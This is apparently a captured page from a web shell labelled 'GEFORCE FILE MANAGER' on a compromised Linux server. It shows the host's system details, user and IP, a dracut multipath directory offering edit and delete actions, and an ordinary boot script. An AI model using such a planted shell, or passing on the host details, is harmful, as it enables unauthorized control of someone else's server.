[ SYSTEM ]: Linux srv.persadacompanies.com 4.18.0-553.56.1.el8_10.x86_64 #1 SMP Tue Jun 10 05:00:59 EDT 2025 x86_64
[ SERVER ]: Apache | PHP: 8.4.20
[ USER ]: persadamedika | IP: 45.64.1.108
GEFORCE FILE MANAGER
/
usr
/
lib
/
dracut
/
modules.d
/
90multipath
/
UPLOAD:
NAME
SIZE
QUICK PERMS
ACTIONS
📄 module-setup.sh
3,465 B
SET
[ EDIT ]
|
[ DEL ]
📄 multipath-shutdown.sh
172 B
SET
[ EDIT ]
|
[ DEL ]
📄 multipathd-configure.service
648 B
SET
[ EDIT ]
|
[ DEL ]
📄 multipathd-needshutdown.sh
162 B
SET
[ EDIT ]
|
[ DEL ]
📄 multipathd-stop.sh
237 B
SET
[ EDIT ]
|
[ DEL ]
📄 multipathd.service
785 B
SET
[ EDIT ]
|
[ DEL ]
📄 multipathd.sh
420 B
SET
[ EDIT ]
|
[ DEL ]
DELETE SELECTED
[ CLOSE ]
EDIT: multipathd.sh
#!/bin/sh if [ "$(getarg rd.multipath)" = "default" ] && [ ! -e /etc/multipath.conf ]; then mkdir -p /etc/multipath/multipath.conf.d mpathconf --enable --user_friendly_names n fi if getargbool 1 rd.multipath -d -n rd_NO_MULTIPATH && [ -e /etc/multipath.conf ]; then modprobe dm-multipath multipathd -B || multipathd need_shutdown else rm -- /etc/udev/rules.d/??-multipath.rules 2>/dev/null fi